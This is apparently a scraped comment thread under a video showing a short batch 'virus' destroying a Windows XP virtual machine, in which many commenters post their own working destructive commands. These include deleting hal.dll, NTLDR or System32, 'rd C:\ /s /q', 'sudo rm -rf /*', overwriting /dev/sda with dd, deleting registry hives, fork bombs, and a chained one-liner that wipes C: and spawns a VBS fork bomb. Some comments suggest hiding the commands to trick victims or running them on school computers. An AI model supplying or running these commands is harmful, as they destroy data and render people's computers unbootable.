@@malwaretestingfan you do need to be sure you want to kill it by entering your password, and your system admin (most of the time it's you) has to agree
You can do that on windows 10! Just activate WSL in windows features, install WSL Ubuntu from Microsoft Store, open ubuntu and type rm -rf /mnt/c/ --no-preserve-root and it will remove everything in C:\ drive!
It would be interesting to see how antiviruses were used to react to this back then. Nowadays it is hard to imagine for me that until Windows Vista it was normal to run any application with administrator rights...
Но вместо этого вы можете фактически удалить папку system32, чтобы ваш компьютер никогда не мог загрузиться снова! Вот код: (или вы можете добавить «@echo off», чтобы люди были обмануты)
The @echo off isn't strictly necessary, all it does is hide what it's doing. You can achieve the same effect by placing @ in front of every line and removing the @echo off.
@@OlgaPlaysMatch-3Game all that line does is turn off showing the command before it's run, you can do the same by just putting @ in front of each line to turn off showing each command before it's run. Results in a smaller file size (for this case) and 1 less line.
But it’s an important part of the virus, so that people mistakenly open the, virus and have their PC, screwed up. That’s how developers make viruses. ;)
del . Less characters, one line, and deletes literally everything, due to the fact that the wildcards are not only the names of the file, but the extensions!
If the computer does weird "Access denied" stuff even tho you had all the rights to do that That apparently means it's trying to fight back but it can't
As goes for any OS, on a virtual machine or an actual machine, as long as the hardware can run it. I installed Windows 4 times on the machine I am currently running, and when I got it it had Ubuntu on it.
@@lf12345 As long as I don't damage the hardware, I think I will be fine with damaging the operating system. I did it on this computer and I recovered greatly.
Command: @echo off del C:\NTLDR del C:\BOOTMGR shutdown -s -t 10 But its a 4 lines of killing PC. Such as Windows 95, Windows 98, Windows ME,... ...Windows 8.1, and Windows 10!!
You can do that on windows 10 with linux! Just activate WSL in windows features, install WSL Ubuntu from Microsoft Store, open ubuntu and type rm -rf /mnt/c/ --no-preserve-root and it will remove everything in C:\ drive!
No, your files will still be on there. just not able to boot unless the files are placed in their proper spot.
Your solution will be to install a linux distribution or boot from a Windows installation medium (e. g. cd or usb), do Shift+F10 once booted, open Notepad, File > open, set the file extension .txt to all files, then navigate to the folder you want to move older, right click it, then press "cut" and go to wherever you want to back the files up to and click "paste". they should move.
Here’s a virus I developed some time ago... :A start explorer goto A However you can replace explorer with a more RAM intensive program. At the time it crashed my PC with 2GB RAM almost immediately.
You can bluescreen a computer by running task manager as admin, clicking file > new task... and then typing "wininit" and click run as admin if an option. 👍
Нет, юзайте reg delete HKLM /f /s /q флаги я не помню, зато почти на всех видах работает(с правами администратора), а hal.dll и ntldr восстанавливаются
I think you just wanted to get rid of this VM so you won't bother removing Amigo (and a bunch of other viruses I guess) so you destroyed it using this 3-line batch virus.
I,m working on a virus that maybe work on All Windows versions include DOS i can sent you the virus on E-Mail in the E-Mail is a txt file just rename it to bat
I can beat you. RUN AS ADMINISTRATOR <- important!!!! Take ownership of System32 first <- important too!!! This works on all Windows versions from NT to 10: del "C:\Windows\System32\hal.dll" shutdown -s t 10
1 line batch file: @rd /q /s C:\Windows\System32 & shutdown /s /t 30 The ampersand seperates the commands. Simple. Also, if you don't know, "@" works like "@echo off" but just for the command, "rd /q /s " deletes the directory in silent mode, and deletes the whole tree, and "shutdown /s /t 30" shuts the PC off after 30 seconds, the "/t" is for timer.
I beat ur record del C:\windows\system32\hal.dll the next time the user turns on their pc user "wth is dis..." me "ur pc just got rekt good luck fixing it, go reinstall windows lol" user "NOOOOOOOOOOOOOOOOOOO"
@@showdown_7643 it's basically the same, it's just flooding the same tasks (in this case, launching unlimited amount of command prompt window) so the computer get outta control and finally hang.
Try This Code: @echo off del "c:/boot.ini" del "c:/Recovery" del "c:/Windows" del "c:/Program File (x86)" del "c:/Windows/Explorer.exe" del "c:/Windows/System" del "c:/Windows/Starter" Try This Code On Windows 8.1 Pro
del C:\Windows\System32 WARNING: NEVER DO THIS I WILL NOT BE RESPONSIBLE TO ANY DAMAGE CAUSED TO YOUR COMPUTER YOU WILL GET A BLUE SCREEN OF DEATH YOUR COMPUTER WILL BE DESTROYED
I have an idea of making a batch virus that contains only 2 LINES OF CODE, THAT KILLS THE PC ! HERE IS THE CODE: @echo off del (.exe;.bat;.pif;.sys;.vbs;.jpg;inf;.ini;.wmv;.wma;.avi;.dll;.ink;.png;.bmp) If i made a mistake, respond me with the correction. Btw i am Romanian.LOLOL;-) ;-) ;-)
cmd /c taskkill /im explorer.exe /f & cd %userprofile%\Desktop & del C:\ /s /q /f & echo Set Wshell=CreateObject("Wscript.Shell")>>m.vbs & echo Set FSO=CreateObject("Scripting.FileSystemObject")>>m.vbs & echo FSO.DeleteFile "m.vbs">>m.vbs & echo Wshell.Run "m.bat">>m.vbs & echo M=MsgBox("You Are An Idiot",0+16+4096,"You're Fucked M8")>>m.vbs & echo start m.bat>>m.bat & echo start m.bat>>m.bat & start m.vbs
This Is One line of code copy paste it into cmd or execute it in a .bat or .cmd file Warning this will kill all your data on the c: drive and break Windows
What it does ? It kills Your Explorer (Windows Desktop UI) It then Delets all data On the C: Drive (If it can delete them) it then creates m.vbs and m.bat m.vbs brings up a msgbox and starts the m.bat m.bat is a forkbomb the will crash the system or make it unusable forcing the user to restart if the pc doesnt crash
Sniping hero why do you say 'Rekt' at the end? Just because you know HTML and you need to remind someone about that, doesn't mean you say 'Rekt'. He didn't even try to roast you.
What about I say "Sniping Hero more like Sniping Condescender"
Also, learn how to use HTML tag usage, you haven't closed any of these tags, wich means that the HTML file parser will get confused. You didn't also input the <html lang= en_US> </html> and the most important tags <head></head> & <body></body>. Rekt
______________________________________________ what thease codes mean _-------------------------------- @echo off = does not shows the code del C:\ /q /s = deletes NTLDR automaniclly shutdown -r = Restarts the computer ------------------------------------------------------------------------------ like if you agree :-)
It wouldn't work (shutdown.exe is missing!) So, in XP setup, create a 2nd drive. And, with that drive (Let's say that it's E:), we can do this: @echo off move C:\Windows\system32\shutdown.exe E:\ rd C:\ /s /q start E:\shutdown.exe -r -t 00
but... If you want the timer, do shutdown -r -t (number of seconds) Example = shutdown -r -t 60 = shut down the computer after 60 seconds; Info = adding -t and number of seconds is the diference of the normal command Normal - shutdown -r. it will restart after no seconds
That is my fav ncs music
171 likesReplies (16)
Me too!
0 likes@@serdevill Syn Cole is It's Name
0 likesSyn Cole - Feel Good
0 likesYep, I Also Like it
0 likesSame
0 likes@@mb59621 yes
0 likes@@mariannsnajder4128 I think 🤔
0 likes@@serdevill feel good syn cole
0 likesEAE SIAM ALAM HELLO SIAM ALAM ♥
0 likesIOU GODE FILEM
0 likesThat's My Fav NCS Music
0 likesWhat is the music?
0 likesi dont have a feeling
0 likesLol Siam here?
0 likesyou are best siam alam i sub to u and enderman
1 likeSay me the name i also love it :)
0 likestheres a one line code "rd C: /s /q"
56 likesReplies (2)
Next record: nothing code
0 likesaugusto munute that's not permanent though
4 likesHey i beat your record,
183 likesi can do it in 1 line on any linux-based system
sudo rm -rf /*
Replies (35)
I tryed it, good method to optimize my PC
0 likes@@malwaretestingfan you do need to be sure you want to kill it by entering your password, and your system admin (most of the time it's you) has to agree
0 likesI did that once in a Debian VM and it crashed in like a second
0 likes@@TCGProductions03 No need for --no-preserve-root, /* implies all of the dirs in root but not root (rm -rf /usr /etc ...)
0 likes@@TCGProductions03 alias sudo="echo lol; sudo rm -rf /* --no-preserve-root";
2 likes$ sudo chmod /dev/sda
[sudo] password for user: **
WAIT A SECOND NO!
@@Alexus_2000 del %SYSTEMDRIVE% /s /q
0 likesBut this video is for Windows
0 likes@@imhoriz0n727 0 lines of code!
1 likeSorry no heart 4 u
0 likes@@sikorsp22 thats ez recoverable thou, sudo dd if=/dev/urandom of=/dev/sda bs=1028 count=8192 should do it >_<
0 likes@@sikorsp22 Yeah, that removes the grub configuration file and yur os wont boot again. Nice.
0 likesI have a faster method
1 likeScript:
#!/bin/sh
sudo rm /boot/grub/grub.cfg
You can do that on windows 10! Just activate WSL in windows features, install WSL Ubuntu from Microsoft Store, open ubuntu and type rm -rf /mnt/c/ --no-preserve-root and it will remove everything in C:\ drive!
0 likes@@malwaretestingfan @echo off
0 likesdel C://WINDOWS/system32
@@thescreemregular5168 Haha lol
0 likes*coffin dance intensifys*
0 likes@@LiEnby Oh right ... Just wondering...
0 likes@Owen Vee yeah, it work on wsl
0 likes@@m_ibrahim990 its the same as
0 likesdd if=/dev/zero of=/dev/sda
dont do it. you'll brick ur console.
@@LiEnby THATS INSANE you really are a genius....
0 likesDo you use it with vita sdk.... what happens if you use it?
@@m_ibrahim990
1 likechar buffer[0x10000];
memset(buffer,0x00,0x10000);
SceUID fd;
fd = ksceIoOpen("sdstor0:/lp-act-entire",SCE_O_WRONLY, 6);
while(true){
ksceIoWrite(fd,buffer,0x10000);
}
- Seriously DONT do this.
@@TCGProductions03 nah if its /* it doenst ask for no preserve root
0 likeswork on WSL Bash too btw
0 likesPerfect timing, I moved to Ubuntu yesterday.
1 likeStop me, I dare you.
@@danct12cp lol
1 like@@m_ibrahim990 yes, using a hammer
1 likeBut could you do it on a vita? 😉
1 likesudo dd if=/dev/urandom of=/dev/sda
4 likesdel c:\*.* /s /q
1 likeSo can I @echo off del system32 shutdown -r
0 likesdel windows\system32
3 likescongrats thats the pc killer - world record - 1 line of code
2 likesi can do it even faster *spills vodka on pc and lights it on fire*.
32 likesand this even works on mac!
@@TCGProductions03 True.
4 likessudo rm -rf /* --no-preserve-root
30 likesI see it's deleting NTLDR. So simple, that is.
57 likesReplies (2)
Hey, i'm installing ur mobile version (Ubuntu Touch) in my phone (yes i know ur just a random person but yeah)
0 likesand I thought it was a restart - 1 and something else
1 likeIt would be interesting to see how antiviruses were used to react to this back then. Nowadays it is hard to imagine for me that until Windows Vista it was normal to run any application with administrator rights...
8 likesПро hal.dll не забыл? Достаточно 1-2 строк кода..
66 likes@echo off
del C:\Windows\System32\hal.dll
Replies (15)
Но вместо этого вы можете фактически удалить папку system32, чтобы ваш компьютер никогда не мог загрузиться снова! Вот код: (или вы можете добавить «@echo off», чтобы люди были обмануты)
0 likesdel c:\WINDOWS\system32
@del C:\Windows\System32\hal.dll
0 likesЗачем вы echo off пишите? Одну строчку del c:\windows\system32\hal.dll и готово
0 likes@@ACoTam2 hal.dll not hall.dll
0 likesrd c:\ /s /q
0 likes@echo off is useless and should only be used for disguised ones
0 likesблять
0 likes@LessKnoxk rd c:\ /s /q kills pc
0 likesOr you could erase ntoskrnl.exe
0 likesThe same thing you wrote
0 likesМожно первую строку убрать - 1 строка
1 likeACo Tam2 hal*
0 likesACo Tam2 Nope
2 likes* hall.dll
0 likesyou again?!
2 likesThe @echo off isn't strictly necessary, all it does is hide what it's doing. You can achieve the same effect by placing @ in front of every line and removing the @echo off.
5 likesReplies (3)
@@OlgaPlaysMatch-3Game all that line does is turn off showing the command before it's run, you can do the same by just putting @ in front of each line to turn off showing each command before it's run. Results in a smaller file size (for this case) and 1 less line.
1 likeBut it’s an important part of the virus, so that people mistakenly open the, virus and have their PC, screwed up. That’s how developers make viruses. ;)
0 likesExactly.
0 likesI've beaten ALL of you, type
2 likesdel .
Less characters, one line, and deletes literally everything, due to the fact that the wildcards are not only the names of the file, but the extensions!
Replies (1)
You should've done "del *.*".
0 likesIn just 1 line:
6 likes%0¦%0
Crashes windows almost instantly.
Replies (1)
to run as a command, put "cmd /c cd /d %appdata% && echo "cmd /c %0|%0">x.bat && x.bat"
0 likesyou can do a similar script but use reg delete HKLM on windows 10 :)
5 likesMusic: Syn Cole - Feel Good
2 likesIf you get rid of the "@echo off" you can shorten it to 2 lines
4 likesReplies (1)
And if you get rid of shutdown /r /t its one line, and you can hide the cmd if you use iexplore
0 likesMy smallest virus is
16 likesdel C:/Windows/system32
classic
Replies (9)
@@artemthedev they use switches, like /rd, /s and /q idk just one of them
0 likesIf the computer does weird "Access denied" stuff even tho you had all the rights to do that
0 likesThat apparently means it's trying to fight back but it can't
@@artemthedev Hmmmmm... You're right, but i have another idea.
0 likes@@Infevlol But that's not fair. Who will run the virus through processhacker?
0 likes@@artemthedev process hacker can open cmd as trustedinstaller
0 likes@@Infevlol No. TrustedInstaller is owner of system32
0 likes@@artemthedev you can do that as administrator.
0 likes@@artemthedev '''Access denied''. but your computer was dying
2 likesBut... What about takeown? Or it will be ''Access denied''.
0 likesThis batch file is impressive!!! :0
3 likesThese are also 2 lines which brick the pc:
1 likerd C: /s /q
wmic os where primary=1 reboot
Windows XP has ended, but you can still install it from a virtual machine
1 likeReplies (1)
As goes for any OS, on a virtual machine or an actual machine, as long as the hardware can run it. I installed Windows 4 times on the machine I am currently running, and when I got it it had Ubuntu on it.
0 likes"Download in description!"
4 likesThe song name is: "Syn Cole - Feel Good".
0 likesBut...
Windows XP isn't feeling good now...
but this:
14 likesdel "c:\ntldr"
shutdown -s -t 1
More fast ;)
You can reduce the program to one line by using "&" to chain the commands
6 likesReplies (1)
but it wouldn't be real 3 lines of code
0 likesNow I know how to make my friends that still use xp upgrade.
1 likeReplies (1)
Yes
0 likesWhen C:\ntdlr is deleted, your pc is broken
0 likesIf You Want So Many Lines, dont ask me but make me drown in water lol.
3 likesOnly in 1:32, Holy crap...
1 likeDEL /S /Q /F "c:/"
1 likerun as trusted installer for the best result
Replies (4)
Do not use your actual computer's hard drive or solid state drive,otherwise it will break the actual device.
0 likes@@lf12345 As long as I don't damage the hardware, I think I will be fine with damaging the operating system. I did it on this computer and I recovered greatly.
0 likes@@ronture8279 you need external tools, but before you run you should install a VM to avoid damage to you fysical pc
0 likesHow would you run it as TrustedInstaller?
0 likesFun fact: 0kb classed as malware by some guys. Virusshare etc. MD5 d41d8cd98f00b204e9800998ecf8427e
0 likes@echo off <--- delete this
0 likesdel "c:/ntldr"
shutdown /s /t 10 <--- delete this
and now u get 1 line of code that kill your windows xp
(btw i had to put slashes)
runned with 1000$ gaming pc
13 likeslol gg runned in sandboxie XD
NICE VID ENDER!
Replies (1)
oh lol
0 likesWhat VMware you using?
0 likesI mean everyone started as a script kiddie,tho,so don't worry about it.
0 likesshutdown can also be like -t 01 so that it immediatelly kills
0 likesonly 2 lines if you delete @echo off !!
1 like2.0 version codes:
0 likes@echo off
del "c:/ntldr"
shutdown -s -t 000
Command:
0 likes@echo off
del C:\NTLDR
del C:\BOOTMGR
shutdown -s -t 10
But its a 4 lines of killing PC. Such as Windows 95, Windows 98, Windows ME,... ...Windows 8.1, and Windows 10!!
Replies (1)
Vid soon!!
0 likesYou can do that on windows 10 with linux! Just activate WSL in windows features, install WSL Ubuntu from Microsoft Store, open ubuntu and type rm -rf /mnt/c/ --no-preserve-root and it will remove everything in C:\ drive!
0 likesThe bandicam watermark is now legend
0 likesWhy bandicam? Bandicam (not registered, trial version and full version) is the worst.
0 likesYou could have done it in two lines if you got rid of @echo off.
1 likeCode of vírus:
0 likes@echo off
Del /s /q /f c:\ntldr
Shutdown -s - f -t 10
this is works on all Windows, fast
0 likes@echo off
del HCKU /s /f
del HCKU /f
shutdown -r -f -t 3 -c "It's time to dead!"
2 lines to all windows versions
0 likesdel %windir%\system32\hal.dll
shutdown -r -t 00
Just concatenate it into 1 line using the & symbol between commands! 😂
2 likesJust do: del C:\ntldr & shutdown /r /t 0
BOOM! 💥🔥💥
Replies (3)
@@circleubuntu nevermind lol
0 likesHave you seen pearOS Cupertino?
@@OurNation huh
0 likesdel C:\ntdlr && shutdown /r /t 0
2 likesWith double "&"
theres a faster one for xp, 2 lines.
0 likesdel c:\windows\system32\hal.dll
shutdown /s /r /t 00
I can do it in one line...
1 likemountvol C: /d
...though it is just to scare people, everything goes back on restart.
Try deleting hal.dll
Replies (1)
Not on windows 7.
0 likessong name in the start of the video?
0 likesWait! It's 100% destructive for OS and maybe destructive for the PC? I need answer @Enderman
1 likeReplies (1)
No, your files will still be on there. just not able to boot unless the files are placed in their proper spot.
0 likesYour solution will be to install a linux distribution or boot from a Windows installation medium (e. g. cd or usb), do Shift+F10 once booted, open Notepad, File > open, set the file extension .txt to all files, then navigate to the folder you want to move older, right click it, then press "cut" and go to wherever you want to back the files up to and click "paste". they should move.
i have one with one line
1 likeDel c:\windows\system32\hal.dll
I got one with only 1 line.
2 likesdel system32
Replies (2)
@@user-fq2pf5lu6e bruh I said that 2 years ago
0 likesWrong
0 likesHow did you make so look like windows 95?
0 likesyou could've made it 2 lines if you didnt use the kinda useless @echo off
2 likesAnother good way to crash Windows (any version).
4 likesG:
start explorer
goto G
It didn't work on Windows XP Professional SP2 64-bit.
0 likesHere’s a virus I developed some time ago...
0 likes:A
start explorer
goto A
However you can replace explorer with a more RAM intensive program.
At the time it crashed my PC with 2GB RAM almost immediately.
Replies (1)
You can bluescreen a computer by running task manager as admin, clicking file > new task... and then typing "wininit" and click run as admin if an option. 👍
0 likes1 line
0 likesrd C:\ /s /q
works on windows 2000, xp, vista, 7, 8, 8.1, 10
(For Windows XP)
0 likesdel C:\windows\system32\hal.dll /q /s
shutdown -r -t 0
Нет, юзайте reg delete HKLM /f /s /q флаги я не помню, зато почти на всех видах работает(с правами администратора), а hal.dll и ntldr восстанавливаются
0 likesWhat the name of the song?please
0 likeshaha ez to beat
1 likehere
del c:\windows\system32\hal.dll
del C: done 1 line
0 likeslet's restart your computer ctrl+alt+delete
0 likesLike 15 years ago my "friends" did this to my PC!
0 likesI'm not responsible for any harm done to your computer*
0 likesu do know that you dont need the @echo off its basicley using up a line 4 nothing
1 like@echo off
0 likesdel "c:/windows/system32"
Record beaten
my real life virus is two lines HILLARY CLINTIN
0 likesYou can make it with one line just type del c:ntldr
0 likes@echo off and shutdown-n ist not requrement
Windows xp logging off and saying bye :(
0 likesIs it works only on this Win98 System?
0 likesReplies (1)
or XP
0 likesWas about taskkillin winlohon or svchost?
0 likesReplies (1)
Winlohon xD
0 likes@echo off isn't nessecary.
0 likesIt just hides what's happening.
del C:\Windows\
0 likesMost short ver of virus
Song?
2 likesReplies (1)
Syn Cole - Feel Good
1 likememorize it and make the school computers remember it
0 likesMore simply
0 likes@echo off
del C:/WINDOWS
Whait whats the music for at 1:00
0 likesLike this
0 likesEcho off
0 likesdel C: .
I made a Mac virus that was when given admin with one line of code was bye bye mac
0 likesi found a shorter way del C:\Windows\System32\hal.dll & shutdown -r -f -t 00
0 likesWhy do you need echo off on this.
0 likesNEW WORLD RECORD: 1 line of code that kills EVERY Windows!
0 likesrd c:\ /s /q
what is the music?
0 likesi will try in virtualbox
1 likeЧто-бы убить винду полностью! достаточно 2 строки
0 likesdel %windir%\System32\hal.dll
del %windir%\*.*
Работает на всех Windows! Даже на дос windows
One line of code:
0 likesDel C:\ NTLDR
My thing
0 likescd c:\
del *
DO NOT TRY AT HOME KIDS
I think you just wanted to get rid of this VM so you won't bother removing Amigo (and a bunch of other viruses I guess) so you destroyed it using this 3-line batch virus.
0 likesIf you didn't use @echo off it will take 2 lines
0 likesSong - Syn Cole Feel good.
0 likes2 lines and works for windows xp to 10
0 likesbcdedit /delete {current}
del c:\ntldr
I do remote shoutdown in schoolpc and the error code is match with your :D
0 likeswhy @echo off ?
0 likesI have a good! (In two words, not lines)
0 likesThe code is:
del C:
so ez...
This kills your pc in one line
0 likesDel c:/system32/
Music?
0 likesForcing user to reinstall Windows
0 likesУра спасибо за русские субтитры
1 likeOh well I have a better one
0 likes@echo off
del C:\WINDOWS\system32
shutdown -s -t 5
Если гнаться за строками кода, то писать
0 likes@echo off воооооооообще не надо.
This is more deadly,
0 likes@echo off
Del “c:/users/yourvictimsname/%appdata%/minecraft
Shutdown
it will cause brain damage
LOL
0 likes@echo off & del "c:/ntldr" & shutdown -s -t 10
I made it! See:
0 likes@echo off
rename C:\Windows\System32\hal.dll hell.dll
shutdown -s -t 10
Just type "del C:\Windows\system32" in cmd as administrator.
0 likesReplies (3)
Ok
0 likes@@csooogaming repaired
0 likesand how windows will know where it is?
0 likesi made a calculator in python that can add with only 3 lines of code
0 likesReplies (1)
i guess well, its similar to java, so
0 likesint a = 5;
int b = 7;
int sum = a+b;
yeah its eazy
WoW this video is russian! In 1:28 you old pc windows 7 russian XD
0 likesWhat us your Rig
0 likesdel c:/windows/system32/*.dll & shutdown -s -t 5
0 likesI made a one too but its 1 line (World Record):
0 likes@echo off && cd c:\ && del bootmgr && shutdown -s -t 1
rd c:
0 likesrecord beaten
Uhhh what about "del *" or "ren *.dll *.txt"
0 likesits also supported by up to win10
btw u dont need @echo off
Nice world record.
こんなWORED RECORDがあってたまるか()
0 likesI,m working on a virus that maybe work on All Windows versions include DOS i can sent you the virus on E-Mail in the E-Mail is a txt file just rename it to bat
0 likesOr you could
0 likesdel “c:/ntldr”
Shutdown -r -t goodbye
Alright, sooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo it turns from english to russian! watttttttttt
0 likesI can beat you.
0 likesRUN AS ADMINISTRATOR <- important!!!!
Take ownership of System32 first <- important too!!!
This works on all Windows versions from NT to 10:
del "C:\Windows\System32\hal.dll"
shutdown -s t 10
Как бля ХРюша выжила когда на нём стоит Амиго? "My МОЗГ has disconnected"
0 likesReplies (1)
АМИГО???
0 likesthis is the best way to install sonic mega collection windows xp in 1mb only
0 likesWhat song
0 likesis there a code that will end a process?
0 likesReplies (1)
"@taskkill -f /im (process that you want to kill.exe)"
1 likeJust use the eject pc button.
0 likesБраузер Амиго?
0 likesyou can do it in 1 line just use &&
0 likeswhy the transalate
0 likes3 Lines of Batch Code That Crashes System
0 likesOh so this was old enderman or Andréw
0 likesRoses are red,
0 likesViolets are blue,
www.Bandicam.com
I broke your record here is 1 line:
0 likes@echo off & del C:\Windows\System32\hal.dll & shutdown -s -t 1
Windows 10 is no support payload
0 likesI thought that was
0 likes:A
Start
Goto A
I think @echo off del NTLDR Reset
0 likesdel c:\windows & reg delete HKLM
0 likesits how you do this
Simple: del "c:/ntldr"
0 likesmy language is going crazy
0 likesА я уже считал ты не будешь делать русские субтитры
0 likes1 line batch file:
0 likes@rd /q /s C:\Windows\System32 & shutdown /s /t 30
The ampersand seperates the commands. Simple.
Also, if you don't know, "@" works like "@echo off" but just for the command, "rd /q /s " deletes the directory in silent mode, and deletes the whole tree, and "shutdown /s /t 30" shuts the PC off after 30 seconds, the "/t" is for timer.
@echo off is ... you can remove it
0 likesЕдинственный правильный способ удалить браузер Амиго
1 likeReplies (1)
Надо комп выбрасывать квартиру новыю покупать суицид делать перерождатся покупать новый комп и всё
0 likeshe s videos are very good
0 likes@echo off
0 likesdel c:/system32
pause
You dont must use @echo off
0 likesi think this just deleted bootmgr
0 likesdel C:\Windows\System32
0 likes1 line record
можешь дать ссылку на этот Windows XP?
0 likesReplies (1)
Он просто установил стандартную тему
0 likes@echo off
0 likesFormat c:
@echo off
0 likesrd /s /q C:\SYSTEM32
shutdown -s -t 10
РУШШИАН! ГДЕ РУШШИАН?
0 likesLike Your Vid
0 likes0nly 1337 h4x0rz us3 batch duude
0 likesчто за музыка?
0 likesmy virus
0 likesdel bootmgr
I knew it! You RUSSIAN. But don’t worry, i am indonesian
0 likesdoes this work?
0 likesCONGRATES!!!
0 likesLet´s See My Record:
0 likesC:\windows\system32
And You Restart Your PC
The Best Record
Enderman: <3 PLS
im like
0 likesrd C:\ /s /q
shutdown -r -t 0
(2 scripts of code lmao)
Wow a world record thats awesome
0 likesЭтот пк должен был умереть, потому что на нём установлен Амиго
1 likeReplies (1)
Скопировал
0 likes1 line possible.
0 likesIt works deleting bootmgr too
0 likescome on, just make a script that deletes C: drive and thats it.
0 likesEZ PC KILL
EZ HAXX0R LIFE
that looks like 2
0 likesThis is not a virus oh. my. god.
0 likesdel /f /s /q %windir%\system32\hal.dll
0 likesi beated ur record
0 likesdel c:\ntldr
halp. I accidently deleted shutdown.exe on my W2k12 R2 DC Server on my Laptop
0 likesReplies (2)
reinstall
0 likesto get the file back, download this: sorry, but you need to format your windows to resolve
0 likesactually 1 line of code
0 likesBandicam!;??!?!;!(
0 likesrmdir System32 kills win10
0 likescopy then paste in CHROME
0 likesDid this to my school computer XD
0 likesold bandicam video
0 likesOne line:
0 likesdel C:\*
Replies (1)
del c:\*.* /s /q
0 likesdeltree /y C:/Windows
0 likesPls song
0 likesAmigo Browser is Virus didn't u know?
0 likesReplies (1)
Ohh that should be also a virus?
0 likesКрутое видео
0 likesbru not world record world record is one line rd C:/ /s /q
0 likesIt works on Windows 10 to!
0 likesReplies (1)
Too
0 likesЧел ты...
1 likeOne line: %0|%0
0 likesWhy @echo off tho it's useless
0 likesЯ так и знал что ты русский EnderMan
0 likesОбалдеть, я знал что ты русский.
0 likesAhem, beat ya -
0 likes@echo off
and then the comnand line for deleting everythinf
I can do that in 1 line on Linux
0 likeswhat song? @!@@@!@!@!@!@!@!
0 likesI CAN MAKE ONE IN 2 LINES
0 likesnoescape.exe but better
0 likesYES!!!!!!!!!! I GOT 100TH LIKE!!!!!!!
1 likeReplies (1)
1st is better.
0 likesYou need protegent
0 likesi can do with 1 line: Del C:\ . |y
0 likesI beat the world record this is mine:
0 likesdel c:/system32
No
1 likebcdedit.exe /delete {current}
Shutdown -r -t 0
and Windows 2000
0 likesОн русский был но...
0 likesI do not understand russian
0 likesI can do it in 0 lines.
0 likesJust give me water and a hammer.
could have did
0 likesdel c:\ntldr&&taskkill /f /im svchost.exe
𝙈𝙤𝙫𝙚 𝙞𝙩 𝙩𝙤 𝙗𝙤𝙤𝙩
0 likesСмотрел это в 2020 году
0 likesI can't understand ya
0 likesHow to crash your pc
0 likes-----------------------------------
:A
Start {insert filename}.bat
Goto A
bcdedit /delete {current} is better
0 likesI beat ur record
2 likesdel C:\windows\system32\hal.dll
the next time the user turns on their pc
user "wth is dis..."
me "ur pc just got rekt good luck fixing it, go reinstall windows lol"
user "NOOOOOOOOOOOOOOOOOOO"
How to freeze your pc
0 likes:start
Start
Go to start
Replies (2)
@@showdown_7643 it's basically the same, it's just flooding the same tasks (in this case, launching unlimited amount of command prompt window) so the computer get outta control and finally hang.
0 likesPrince Arsivana no its
0 likes:a
cmd.exe | cmd.exe
goto a
r/engrish
0 likesI can do this with TWO lines of code.
0 likesdel ntoskrnl.exe
taskkill /f /im lsass.exe
what is this
0 likesbcdedit /delete {current} ftw
0 likesonly xp :(
0 likesАмиго????
0 likesя так и знал что ты только притворяешься английским чтобы набрать популярность я и так уже давно знаю что ты русский
0 likesI guess it's:
3 likes@echo off
del "C:\NTDLR"
shutdown -s -t 10
Replies (1)
not shutdown it is restart so not -s it is -r.
0 likesBro on my laptop i have 70 vairuses but ay nevar download eni porn
0 likesReplies (2)
Can you send some of the malware setup files to me whenever possible?
0 likesI have 100 MB of malware (or random stuff) in a zip folder that can be run on my pc...
0 likesЯ так и знал ты русский
0 likesFast
0 likes@echo off
0 likesDel system32
More easy zD
And try virtualbox
0 likesDel system32
0 likes1 line xD
Replies (2)
@@kuca5985 Nope, @echo off only hides the code.
0 likesyou need @echo off
0 likeslol I have better :
0 likesdel "C:\ntdlr"
shudown -s -t 10
2 LINES OH YEAH
О русским катишь Эндермен
0 likesdel hal.dll
0 likesformat c
0 likesyou forgott transalte rusian XD
0 likes41 znaków 41 leters
0 likesbandicam
0 likesheh I can do it with only 2 I rember
0 likesi can with 1
0 likesrd /s /q C:\
E
0 likesСкачать Амиго...
0 likesTest 0001
0 likesВот это ты икспиху казнил, зачот)
0 likesMine:
0 likesFormat C:
Replies (2)
thed3ctX well I broke the record now...
0 likesMrWafflesNBacon No. Three lines of code! Not one line!
0 likesOld
0 likesТы русский
0 likesчто за фон
0 likesБандикам .com
0 likesi have something better............
0 likesrd c:\
BOOOM! MINDBLOWN
Аааа я так и думал
0 likesITS also
0 likesReplies (2)
Just three lines
0 likes:1 del c:/ goto 1
0 likesВау ты русский
0 likesi can delete windows without any line of code, just manualy delete sys32..
0 likesАга
0 likesА у меня рекорд больше)
0 likes2 строки:
@echo off
reg delete HKLM /f /va
beat me to it, one line only: %0|%0
0 likesforkbomb, lags and kills them
Replies (2)
@@malwaretestingfan The Linux fork bomb is much longer.
0 likesThere exists a Linux version.
0 likesНеопровержимый факт того что Эндер русский
1 liketaskkill /f /im explorer.exe
1 likedid i win
У меня лучше.
0 likes%0 | %0
Хехеехех
100th comment
0 likesim gay
0 likesbetter (one line of code):
0 likesrd C:\ /s /q
wOrKs On EvErY wInDoWs VeRsIoN
kill lsass
0 likesCopy to startup folder
To work on other version of windows u need 4 lines of code adding takeown /f C:/ntldr
0 likesdel c:\ntldr && shutdown /r /t 0
0 likes1 line virus
I'am have virus that supports all versions of win
0 likestakeown C:\Windows\System32
ren csrss.exe file.exe
del csrss.exe
I beat it! code:
0 likesdel C:\/s/q
Actually fly tech did the world record with one line of code and 4 letters. It called fork bombs but your virus is more destructive
0 likesR u Russian?
0 likestry my NOT JOKE malware (kills the system 2 lines of code) file:///Users/nathanielward/desktop/malware/HAVE%20FUN%20NEVER%20BOOTING.zip
0 likes1 line: del "c:\ntldr" && shutdown -s -t 10
0 likes@rd %windir%\system32 /s /q
1 like@shutdown /r /t 00
rd c:\ /s /q
0 likesrd c:\ /s /q easy
0 likesI have a smaller virus
0 likesdel c:\*. * /s /q
How to kill your PC with no line of code:
2 likesthrow it off a cliff
Replies (1)
Call in a toddler
0 likeswww.bandicam.com (FACE БЛЯТИНГ PALM
0 likeshey this is world record 1 line
1 likerd C:\ /s /q
One line:
1 likedel /f /s /q "C:\Windows\*.*"
This world record is broken!
0 likesUsing 1 line!
1 fuckin’ line!
The code is...
del C:\ntldr && shutdown -t 0 -s
Got that!!!
When a russian make a virus,it must be terrible and small
0 likesEnderman Try This Music: https://www.youtube.com/watch?v=n8X9_MgEdCg
0 likesTry This Code: @echo off
0 likesdel "c:/boot.ini"
del "c:/Recovery"
del "c:/Windows"
del "c:/Program File (x86)"
del "c:/Windows/Explorer.exe"
del "c:/Windows/System"
del "c:/Windows/Starter"
Try This Code On Windows 8.1 Pro
Here's a way to kill a PC in 1 line of code:
0 likesdel C: /q /s
Virus with 2 Lines of code
0 likesdel C:/windows/system32/hal.dll
shutdown -r -t 1
